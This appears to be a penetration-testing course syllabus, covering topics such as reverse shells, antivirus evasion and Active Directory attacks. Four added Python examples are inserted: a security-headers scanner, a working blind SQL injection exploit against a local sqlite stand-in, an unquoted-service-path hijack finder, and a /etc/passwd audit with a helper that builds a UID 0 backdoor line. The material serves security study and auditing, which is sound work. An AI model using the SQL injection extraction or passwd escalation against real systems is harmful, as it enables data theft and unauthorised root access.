Passive information gathering:
- Taking Notes
- Website Recon
- Open-Source Code
- Shodan
- Security Headers Scanner
- SSL Server Test
- Pastebin
- User Information Gathering
- Social Media Tools
- Stack Overflow
- Information Gathering Frameworks
OSINT Framework
Maltego
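Added example for the "Security Headers Scanner" item above: a minimal version of the check such a scanner performs, written for this page and not taken from any scanner or course material. It parses a raw HTTP response header block and reports hardening headers that are missing or weakly configured. The response text is constructed for the example; in practice the input is the header block captured from the target (for instance with `curl -sI`). The one-year HSTS threshold and the list of expected headers are the example's own assumptions.

```python
"""Security-headers check over a raw HTTP response (added example)."""

# Constructed sample response; not captured from any real host.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "Strict-Transport-Security: max-age=300\r\n"
    "Content-Security-Policy: default-src 'self' 'unsafe-inline'\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)

# Headers the check expects to see, with the risk when each is absent (assumed list).
EXPECTED = {
    "strict-transport-security": "HTTPS is not pinned for returning visitors",
    "content-security-policy": "no script-source restrictions",
    "x-content-type-options": "browsers may MIME-sniff responses",
    "x-frame-options": "page can be framed (clickjacking)",
    "referrer-policy": "full URLs may leak in the Referer header",
}

ONE_YEAR = 31536000  # seconds; assumed minimum for HSTS max-age


def parse_headers(raw):
    """Return {lowercase-name: value}; the status line is dropped."""
    headers = {}
    lines = raw.replace("\r\n", "\n").split("\n")
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def hsts_max_age(value):
    """Extract max-age from an HSTS value, or None when it is absent/malformed."""
    for directive in value.split(";"):
        key, _, num = directive.strip().partition("=")
        if key.lower() == "max-age" and num.isdigit():
            return int(num)
    return None


def check_headers(headers):
    """Return a list of (header, problem) findings."""
    findings = []
    for name, why in EXPECTED.items():
        if name not in headers:
            findings.append((name, f"missing: {why}"))

    hsts = headers.get("strict-transport-security")
    if hsts is not None:
        age = hsts_max_age(hsts)
        if age is None or age < ONE_YEAR:
            findings.append(("strict-transport-security", f"max-age {age} is below one year"))

    csp = headers.get("content-security-policy", "")
    for weak in ("'unsafe-inline'", "'unsafe-eval'"):
        if weak in csp:
            findings.append(("content-security-policy", f"policy allows {weak}"))

    xfo = headers.get("x-frame-options", "").upper()
    if xfo and xfo not in ("DENY", "SAMEORIGIN"):
        findings.append(("x-frame-options", f"unrecognised value {xfo!r}"))

    server = headers.get("server", "")
    if any(ch.isdigit() for ch in server):
        findings.append(("server", f"version disclosure: {server}"))
    return findings


def scan(raw_response):
    return check_headers(parse_headers(raw_response))


if __name__ == "__main__":
    for header, problem in scan(SAMPLE_RESPONSE):
        print(f"[!] {header}: {problem}")
```

The value checks matter as much as presence: an HSTS header with a 300-second max-age or a CSP that permits 'unsafe-inline' passes a naive "is the header there" test while offering little protection.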
Networking tools:
Netcat vs Socat
Socat File Transfers
Socat Reverse Shells
Socat Encrypted Bind Shells
PowerShell File Transfers
PowerShell Reverse Shells
PowerShell Bind Shells
Powercat
Powercat File Transfers
Powercat Reverse Shells
Powercat Bind Shells
Powercat Stand-Alone Payloads
Active Information Gathering:
- Masscan
Web application attacks:
- Introduction to OWASP Top 10
- File inclusion
Local File Inclusion
Remote File Inclusion
- Automated SQL Injection tools
SQL Map
Writing SQL Injection Exploit
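Added example for the "Writing SQL Injection Exploit" item: a boolean-based blind injection exploit run end to end against a local stand-in for the vulnerable application, so it works offline. The stand-in is an in-memory sqlite3 database whose login query concatenates user input (the bug); the hardened, parameterised query is shown beside it so the same exploit can be seen failing. This code was written for this page, not taken from the course or any tool, and the table, column, account names and secret are all constructed.

```python
"""Boolean-based blind SQL injection against a local sqlite3 stand-in (added example)."""
import sqlite3


def build_target():
    """Constructed target: one table, one secret worth extracting."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cr3t!pw')")
    db.execute("INSERT INTO users (username, password) VALUES ('bob', 'hunter2')")
    return db


def vulnerable_login(db, username):
    """The bug: user input is concatenated into the query. Returns True when a
    row matches, which is the only signal the attacker needs."""
    query = f"SELECT id FROM users WHERE username = '{username}'"
    return db.execute(query).fetchone() is not None


def safe_login(db, username):
    """The fix: a bound parameter, so the quote in the payload is just data."""
    row = db.execute("SELECT id FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None


def make_oracle(db, login):
    """Wrap a login function as a yes/no oracle for an injected condition
    and count how many requests the extraction costs."""
    def oracle(condition):
        oracle.requests += 1
        payload = f"admin' AND ({condition}) -- "
        return login(db, payload)
    oracle.requests = 0
    return oracle


def extract_length(oracle, subquery, max_len=64):
    for n in range(max_len + 1):
        if oracle(f"LENGTH(({subquery})) = {n}"):
            return n
    raise RuntimeError("no response matched; injection point is probably not exploitable")


def extract_string(oracle, subquery, max_len=64):
    """Recover a string one character at a time with a binary search over
    printable ASCII (7 oracle queries per character instead of up to 95)."""
    length = extract_length(oracle, subquery, max_len)
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"UNICODE(SUBSTR(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


# Sub-select whose result the attacker wants; names are constructed.
SECRET = "SELECT password FROM users WHERE username = 'admin'"

if __name__ == "__main__":
    db = build_target()
    oracle = make_oracle(db, vulnerable_login)
    print("recovered:", extract_string(oracle, SECRET), "in", oracle.requests, "requests")
    try:
        extract_string(make_oracle(db, safe_login), SECRET)
    except RuntimeError as err:
        print("hardened version:", err)
```

Against a real target the oracle body is the only part that changes: it sends the payload in the vulnerable parameter and maps the response (page text, status code, or timing) to True/False. The length probe first is deliberate, since it also tells you quickly whether the injection point works at all.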
Privilege escalation:
- Manual Enumeration
- Automated Enumeration
- Windows Privilege Escalation Examples
Understanding Windows Privileges and Integrity Levels
Introduction to User Account Control (UAC)
Insecure File Permissions
Leveraging Unquoted Service Paths
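Added example for "Leveraging Unquoted Service Paths": the analysis behind the check, written for this page rather than taken from the course. Given service entries as reported by `wmic service get name,pathname,startmode` (or `Get-CimInstance Win32_Service`), it lists the paths CreateProcess will try before the intended binary and keeps only those whose directory the current user could write to. The service rows and the writable-directory set are constructed; on a real host they come from wmic/Get-CimInstance and from `icacls` on each candidate directory.

```python
"""Unquoted-service-path hijack candidates (added example)."""
import ntpath
from dataclasses import dataclass

# Constructed rows: (Name, PathName, StartMode). Not from a real host.
SAMPLE_SERVICES = [
    ("Spooler", r'"C:\Windows\System32\spoolsv.exe"', "Auto"),
    ("VulnSvc", r"C:\Program Files\Example Vendor\Agent Service\agent.exe -run", "Auto"),
    ("NoSpaces", r"C:\Tools\svc.exe", "Auto"),
    ("ManualSvc", r"C:\Program Files\Other Vendor\tool.exe", "Manual"),
]


@dataclass
class Finding:
    name: str
    pathname: str
    plantable: list  # candidate paths whose directory is writable


def hijack_candidates(pathname):
    """Paths Windows tries, in order, before reaching the real executable.
    Returns [] when the path is quoted or contains no spaces."""
    cmd = pathname.strip()
    if cmd.startswith('"') or " " not in cmd:
        return []
    tokens = cmd.split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            break  # this prefix is the intended binary; later tokens are arguments
        candidates.append(prefix + ".exe")  # CreateProcess appends .exe when no extension is given
    return candidates


def _norm(path):
    return ntpath.normpath(path).lower()


def audit(services, writable_dirs):
    """Report auto-start services only: a reboot (or the service's own
    restart) then runs the planted binary as the service account."""
    writable = {_norm(d) for d in writable_dirs}
    findings = []
    for name, pathname, startmode in services:
        if startmode.lower() != "auto":
            continue
        plantable = [c for c in hijack_candidates(pathname)
                     if _norm(ntpath.dirname(c)) in writable]
        if plantable:
            findings.append(Finding(name, pathname, plantable))
    return findings


if __name__ == "__main__":
    # Assumed writable directory for the demo; check real ones with icacls.
    for f in audit(SAMPLE_SERVICES, {r"C:\Program Files\Example Vendor"}):
        print(f.name, "->", ", ".join(f.plantable))
```

A candidate is only useful if you can both write the file and get the service restarted (or the host rebooted), which is why the audit discards manual-start services; also confirm that the service runs as LocalSystem or another account worth having before spending effort on it.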
- Linux Privilege Escalation Examples
Understanding Linux Privileges
Insecure File Permissions
Insecure File Permissions: /etc/passwd
Kernel Vulnerabilities
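Added example for "Insecure File Permissions: /etc/passwd": an audit of a passwd file for the conditions behind that escalation. A writable /etc/passwd lets a low-privileged user append a UID 0 entry whose password hash sits in the passwd file's second field, which login and su still honour. The code was written for this page and is not course material; the file content and the placeholder hash string are constructed, and `audit_file()` is meant to be pointed at /etc/passwd on a real host.

```python
"""Audit a passwd file for writable mode, extra UID 0 users and in-file hashes (added example)."""
import os
import stat
import tempfile

# Constructed content. The "backup" hash is a placeholder in md5crypt layout, not a real hash.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backup:$1$c0nstru$ctedPlaceholderHash00:0:0:backup:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""

LOCKED = ("x", "*", "!", "!!")  # password kept in shadow, or account locked


def parse_passwd(text):
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 colon-separated fields, got {len(fields)}")
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"name": name, "password": pw, "uid": int(uid),
                        "gid": int(gid), "home": home, "shell": shell})
    return entries


def audit_entries(entries):
    findings = []
    for e in entries:
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"{e['name']}: UID 0 account other than root")
        if e["password"] == "":
            findings.append(f"{e['name']}: empty password field, no password needed")
        elif e["password"] not in LOCKED and not e["password"].startswith("!"):
            findings.append(f"{e['name']}: password hash stored in passwd instead of shadow")
    return findings


def audit_mode(path):
    mode = os.stat(path).st_mode
    if mode & stat.S_IWOTH:
        return [f"{path}: world-writable ({stat.filemode(mode)})"]
    if mode & stat.S_IWGRP:
        return [f"{path}: group-writable ({stat.filemode(mode)})"]
    return []


def audit_file(path):
    with open(path) as fh:
        entries = parse_passwd(fh.read())
    return audit_mode(path) + audit_entries(entries)


def root_entry(user, pw_hash):
    """The line an attacker appends once the file is writable. pw_hash is
    produced separately, e.g. with `openssl passwd -1 <password>`."""
    return f"{user}:{pw_hash}:0:0::/root:/bin/bash"


def demo(text=SAMPLE_PASSWD, mode=0o666):
    """Write the sample with the given mode, audit it and return the findings."""
    with tempfile.NamedTemporaryFile("w", delete=False) as tmp:
        tmp.write(text)
    try:
        os.chmod(tmp.name, mode)  # 0o666 is the misconfiguration under discussion
        return audit_file(tmp.name)
    finally:
        os.unlink(tmp.name)


if __name__ == "__main__":
    for finding in demo():
        print("[!]", finding)
```

The same parser doubles as a sanity check on the line you intend to append: run it through `parse_passwd()` first, because a malformed entry in /etc/passwd can lock everyone out of the box, including you.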
Client side attacks:
- Collecting client information
Passive client information gathering
Active client information gathering
Social engineering and client side attacks
Browser based exploits
Browser based exploit tools
Network tunneling and port redirection:
- Port forwarding and redirection
- SSH Tunneling
Local port forwarding
Remote port forwarding
Dynamic port forwarding
- Proxy chains
- HTTP Tunneling
- Traffic encapsulation
File Transfers:
- Considerations and Preparation
Danger of Transferring Attack Tools
Installing Pure-FTPd
The Non-Interactive Shell
- Transferring Files with Windows Hosts
Non Interactive FTP Download
Windows Downloads Using Scripting Languages
Windows Downloads with exe2hex and PowerShell
Windows Uploads Using Windows Scripting Languages
Uploading Files with TFTP
Metasploit framework:
- Post Exploitation with Metasploit
Core Post-Exploitation Features
Migrating Processes
Post-Exploitation Modules
Pivoting with the Metasploit Framework
Metasploit Automation
Antivirus Evasion:
- What is Antivirus Software
- Methods of Detecting Malicious Code
Signature Based Detection
Heuristic and Behavioral Based Detection
- Bypassing Antivirus Detection
On-Disk Evasion
In-Memory Evasion
Practical Example
Active Directory Attacks:
- Active Directory Theory
- Active Directory Enumeration
Traditional Approach
A Modern Approach
Resolving Nested Groups
Currently Logged on Users
Enumeration Through Service Principal Names
- Active Directory Authentication
NTLM Authentication
Kerberos Authentication
Cached Credential Storage and Retrieval
Service Account Attacks
Low and Slow Password Guessing
- Active Directory Lateral Movement
Pass the Hash
Overpass the Hash
Pass the Ticket
Distributed Component Object Model
- Active Directory Persistence
Golden Tickets
Domain Controller Synchronization
PowerShell Empire:
- Installation, Setup, and Usage
PowerShell Empire Syntax
Listeners and Stagers
The Empire Agent
Situational Awareness
Credentials and Privilege Escalation
Lateral Movement
- Switching Between Empire and Metasploit